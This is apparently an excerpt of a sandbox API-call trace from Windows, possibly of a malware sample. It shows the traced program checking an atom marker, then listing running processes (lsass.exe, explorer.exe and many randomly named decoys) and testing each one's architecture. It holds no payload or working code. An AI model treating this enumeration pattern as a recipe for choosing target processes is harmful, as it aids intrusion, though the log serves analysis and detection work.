	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.206] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0084.206] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.206] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0084.206] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0084.206] CloseHandle (hObject=0x610) returned 1
	[0084.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0084.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x397e848, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0084.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e698, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x610
	[0084.207] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.207] CloseHandle (hObject=0x610) returned 1
	[0084.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x397e848, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0084.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0084.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x397e638, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16de0) returned 0xc0000004
	[0084.304] VirtualAlloc (lpAddress=0x0, dwSize=0x16ee0, flAllocationType=0x3000, flProtect=0x4) returned 0x3bf0000
	[0084.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bf0000, Length=0x16ee0, ResultLength=0x0 | out: SystemInformation=0x3bf0000, ResultLength=0x0) returned 0x0
	[0084.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0084.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x397e8c0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0084.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0084.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397eab8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0084.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x397e9c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0084.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397e8c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0084.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x397eab8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0084.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0084.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x397e8c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0084.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e998, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0084.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e998, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0084.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x76c930, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0084.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0084.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e998, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0084.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0084.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0084.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e998, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0084.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0084.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0084.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397ea58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0084.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x397ea58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x65c
	[0084.310] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.310] CloseHandle (hObject=0x65c) returned 1
	[0084.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x397e8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0084.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0084.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x396ea50, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0084.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x65c
	[0084.311] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.311] CloseHandle (hObject=0x65c) returned 1
	[0084.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x396e750, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0084.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0084.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x65c
	[0084.312] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.312] CloseHandle (hObject=0x65c) returned 1
	[0084.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397ea58, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x65c
	[0084.312] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.312] CloseHandle (hObject=0x65c) returned 1
	[0084.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x65c
	[0084.312] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.312] CloseHandle (hObject=0x65c) returned 1
	[0084.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397eaa0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x65c
	[0084.312] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.312] CloseHandle (hObject=0x65c) returned 1
	[0084.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x396ea50, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0084.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x65c
	[0084.313] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.313] CloseHandle (hObject=0x65c) returned 1
	[0084.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x397e998, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x65c
	[0084.313] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.313] CloseHandle (hObject=0x65c) returned 1
	[0084.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0084.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x397e9f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x65c
	[0084.314] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.314] CloseHandle (hObject=0x65c) returned 1
	[0084.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397e998, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x65c
	[0084.314] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.314] CloseHandle (hObject=0x65c) returned 1
	[0084.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x65c
	[0084.314] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.314] CloseHandle (hObject=0x65c) returned 1
	[0084.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x396e870, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0084.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0084.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x65c
	[0084.315] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.315] CloseHandle (hObject=0x65c) returned 1
	[0084.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x396e7d0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x65c
	[0084.315] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.315] CloseHandle (hObject=0x65c) returned 1
	[0084.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x76c8d0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0084.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x65c
	[0084.315] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.315] CloseHandle (hObject=0x65c) returned 1
	[0084.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x396e7d0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0084.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x65c
	[0084.315] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.315] CloseHandle (hObject=0x65c) returned 1
	[0084.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x3985cd8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0084.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x65c
	[0084.316] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.316] CloseHandle (hObject=0x65c) returned 1
	[0084.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x396ea50, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x65c
	[0084.316] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.316] CloseHandle (hObject=0x65c) returned 1
	[0084.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x65c
	[0084.316] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.316] CloseHandle (hObject=0x65c) returned 1
	[0084.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x397e8d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x65c
	[0084.316] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.317] CloseHandle (hObject=0x65c) returned 1
	[0084.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x396ea50, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0084.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x65c
	[0084.317] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.317] CloseHandle (hObject=0x65c) returned 1
	[0084.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x396ea50, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x65c
	[0084.317] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.317] CloseHandle (hObject=0x65c) returned 1
	[0084.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x397e998, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x65c
	[0084.317] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.317] CloseHandle (hObject=0x65c) returned 1
	[0084.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x397e9b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x65c
	[0084.318] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.318] CloseHandle (hObject=0x65c) returned 1
	[0084.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x3985b20, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0084.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x65c
	[0084.318] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.318] CloseHandle (hObject=0x65c) returned 1
